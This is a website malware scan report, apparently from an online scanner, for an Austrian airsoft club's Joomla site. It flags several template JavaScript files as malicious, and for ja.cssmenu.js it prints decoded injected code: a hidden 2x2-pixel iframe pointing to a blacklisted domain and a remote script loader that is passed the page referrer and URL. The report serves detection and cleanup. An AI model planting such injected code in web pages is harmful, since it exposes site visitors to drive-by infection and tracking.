Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=bundesheer-airsoft.org
Result: The website is marked by Google as suspicious: visiting this website may harm your computer.
Details are available here.
Result: The website is marked by Google as suspicious: visiting this website may harm your computer.
Details are available here.
Scanned pages/files
Request | Server response | Status |
http://bundesheer-airsoft.org/ | 200 OK Content-Length: 28490 Content-Type: text/html | clean |
http://bundesheer-airsoft.org/media/system/js/caption.js | 200 OK Content-Length: 3735 Content-Type: application/javascript | clean |
http://bundesheer-airsoft.org/plugins/content/jw_allvideos/includes/players/wmvplayer/silverlight.js | 200 OK Content-Length: 17901 Content-Type: application/javascript | clean |
http://bundesheer-airsoft.org/plugins/content/jw_allvideos/includes/players/wmvplayer/wmvplayer.js | 200 OK Content-Length: 24010 Content-Type: application/javascript | clean |
http://bundesheer-airsoft.org/plugins/content/jw_allvideos/includes/players/quicktimeplayer/AC_QuickTime.js | 200 OK Content-Length: 8527 Content-Type: application/javascript | clean |
http://bundesheer-airsoft.org/plugins/content/jw_allvideos/includes/jw_allvideos.js | 200 OK Content-Length: 6770 Content-Type: application/javascript | clean |
http://bundesheer-airsoft.org/templates/ja_purity/js/ja.script.js | 200 OK Content-Length: 4793 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antivirus engines (see below).
Excerpt of the served file (cut off by the scanner; only the start of the file is shown, so the flagged portion may lie beyond this excerpt):
var siteurl = ''; function fixIEPNG(el, bgimgdf, sizingMethod, type, offset){ var objs = el; if(!objs) return; if ($type(objs) != 'array') objs = [objs]; if(!sizingMethod) sizingMethod = 'crop'; if(!offset) offset = 0; var blankimg = siteurl + 'images/blank.png'; objs.each(function(obj) { var bgimg = bgimgdf; if (obj.tagName == 'IMG') { if (!bgimg) bgimg = obj.src; if (!(/\.png$/i).test(bgimg) || (/blank\.png$/i).test(bgimg)) re
Antivirus reports: (the per-engine results are not reproduced in this text)
| ||
http://bundesheer-airsoft.org/templates/ja_purity/js/ja.rightcol.js | 200 OK Content-Length: 3281 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antivirus engines (see below).
Excerpt of the served file (cut off by the scanner; only the start of the file is shown, so the flagged portion may lie beyond this excerpt):
var JA_Collapse_Mod = new Class({ initialize: function(myElements) { options = Object.extend({ transition: Fx.Transitions.quadOut }, {}); this.myElements = myElements; var exModules = excludeModules.split(','); exModules.each(function(el,i){exModules[i]='Mod'+el}); myElements.each(function(el, i){ el.elmain = $E('.jamod-content',el); el.titleEl = $E('h3',el); if(!el.titleEl) return; if (exModules.contains(el.id)) {
Antivirus reports: (the per-engine results are not reproduced in this text)
| ||
http://bundesheer-airsoft.org/templates/ja_purity/js/ja.cssmenu.js | 200 OK Content-Length: 2164 Content-Type: application/javascript | malicious |
Malicious code found. Script contains blacklisted domain: online1you.com
Excerpt of the file as served (partly skipped by the scanner):
sfHover = function() { var sfEls = document.getElementById("ja-mainnav").getElementsByTagName("li"); for (var i=0; i<sfEls.length; ++i) { sfEls[i].onmouseover=function() { clearTimeout(this.timer); if(this.className.indexOf(" sfhover") == -1) this.className+=" sfhover"; } sfEls[i].onmouseout=function() { this.timer = setTimeout(sfHoverOut.bind(this), 20); } } } function sfHo ...[1827 bytes skipped]...
Decoded script (partly skipped by the scanner):
...[69 bytes skipped]... innav").getElementsByTagName("li"); for (var i = 0; i < sfEls.length; ++i) { sfEls[i].onmouseover = function () {clearTimeout(this.timer);if (this.className.indexOf(" sfhover") == -1) {this.className += " sfhover";}}; sfEls[i].onmouseout = function () {this.timer = setTimeout(sfHoverOut.bind(this), 20);}; } } var _escape='%3Cscript%3E%20%3Bdocument.write%28%27%3Ciframe%20src%3D%22http%3A//online1you.com/1/search.php%3Fsid%3D1%22%20scrolling%3D%22auto%22%20frameborder%3D%22no%22%20align%3D%22center%22%20height%3D%222%22%20width%3D%222%22%3E%3C/iframe%3E%27%29%3B%0A%3C/script%3E';var I00 = document.createElement('script'); I00.src = 'http://api.obfuscatorjavascript.com/?getsrc=ok'+'&ref='+encodeURIComponent(document.referrer)+'&url='+encodeURIComponent(document.URL); var O1O = document.getElementsByTagName('head')[0]; O1O.appendChild(I00);document.write(unescap ...[614 bytes skipped]...
What the decoded excerpt shows: after the ordinary sfHover menu handler, the file defines a URL-encoded string (_escape) that decodes to a document.write of a 2x2-pixel iframe pointing at online1you.com, and it appends a script element loaded from api.obfuscatorjavascript.com that is passed the page's referrer and URL. The final document.write(unescap... call is cut off by the scanner.
| ||
http://bundesheer-airsoft.org/index.php | 200 OK Content-Length: 31204 Content-Type: text/html | clean |
http://bundesheer-airsoft.org/modules/mod_swmenufree/transmenu_Packed.js | 404 Not Found Content-Length: 328 Content-Type: text/html | clean |
http://bundesheer-airsoft.org/test404page.js | 404 Not Found Content-Length: 300 Content-Type: text/html | clean |
http://bundesheer-airsoft.org/modules/mod_swmenufree/jquery-1.2.6.pack.js | 200 OK Content-Length: 73758 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antivirus engines (see below).
Excerpt of the served file (cut off by the scanner; only the start of the file is shown, so the flagged portion may lie beyond this excerpt):
(function(A,w){function ma(){if(!c.isReady){try{s.documentElement.doScroll("left")}catch(a){setTimeout(ma,1);return}c.ready()}}function Qa(a,b){b.src?c.ajax({url:b.src,async:false,dataType:"script"}):c.globalEval(b.text||b.textContent||b.innerHTML||"");b.parentNode&&b.parentNode.removeChild(b)}function X(a,b,d,f,e,j){var i=a.length;if(typeof b==="object"){for(var o in b)X(a,o,b[o],f,e,d);return a}if(d!==w){f=!j&&f&&c.isFunction(d);for(o=0;o<i;o++)e(a[o],b,f?d.call(a[o]
Antivirus reports: (the per-engine results are not reproduced in this text)
| ||
http://bundesheer-airsoft.org/index.php?option=com_content&view=category&layout=blog&id=8&Itemid=1 | 200 OK Content-Length: 29206 Content-Type: text/html | clean |
http://bundesheer-airsoft.org/index.php?option=com_content&view=article&id=9&Itemid=14 | 200 OK Content-Length: 20288 Content-Type: text/html | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: bundesheer-airsoft.org
Result:
HTTP/1.1 200 OK
Cache-Control: post-check=0, pre-check=0
Connection: close
Date: Tue, 03 Jun 2014 21:03:11 GMT
Pragma: no-cache
Server: Apache/2.2.22 (Fedora)
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Tue, 03 Jun 2014 21:03:11 GMT
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Set-Cookie: 090874703c6fa430214ebe483f9b987d=0i3g9p7m3erkrlp4m1pbf603p3; path=/
Set-Cookie: ja_purity_tpl=ja_purity; expires=Sun, 24-May-2015 21:03:11 GMT; path=/
X-Powered-By: PHP/5.3.14
GET / HTTP/1.1
Host: bundesheer-airsoft.org
Result:
HTTP/1.1 200 OK
Cache-Control: post-check=0, pre-check=0
Connection: close
Date: Tue, 03 Jun 2014 21:03:11 GMT
Pragma: no-cache
Server: Apache/2.2.22 (Fedora)
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Tue, 03 Jun 2014 21:03:11 GMT
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Set-Cookie: 090874703c6fa430214ebe483f9b987d=0i3g9p7m3erkrlp4m1pbf603p3; path=/
Set-Cookie: ja_purity_tpl=ja_purity; expires=Sun, 24-May-2015 21:03:11 GMT; path=/
X-Powered-By: PHP/5.3.14
Second query (visit from search engine):
GET / HTTP/1.1
Host: bundesheer-airsoft.org
Referer: http://www.google.com/search?q=bundesheer-airsoft.org
Result:
The response is similar to that of the first query. No suspicious redirects were found.
GET / HTTP/1.1
Host: bundesheer-airsoft.org
Referer: http://www.google.com/search?q=bundesheer-airsoft.org
Result:
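The response is similar to that of the first query. No suspicious redirects were found. Only the Referer header was varied between the two queries, so a redirect conditioned on other request properties (for example User-Agent, cookies or client IP) would not have been observed by this test.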